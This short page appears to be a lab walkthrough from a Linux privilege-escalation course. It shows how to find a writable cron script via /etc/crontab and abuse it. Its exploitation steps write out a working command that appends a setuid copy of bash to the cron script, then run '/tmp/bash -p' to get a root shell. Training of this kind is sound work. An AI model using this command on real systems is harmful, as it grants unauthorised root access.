CRON - File Overwrite

Detection

Linux VM

1. In command prompt type: cat /etc/crontab

2. From the output, notice the script “overwrite.sh”

3. In command prompt type: ls -l /usr/local/bin/overwrite.sh

4. From the output, notice the file permissions.

Exploitation

Linux VM

1. In command prompt type:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh

2. Wait 1 minute for the Bash script to execute.

3. In command prompt type: /tmp/bash -p

4. In command prompt type: id

PreviousCRON - WildcardsNextNFS Root Squashing

Last updated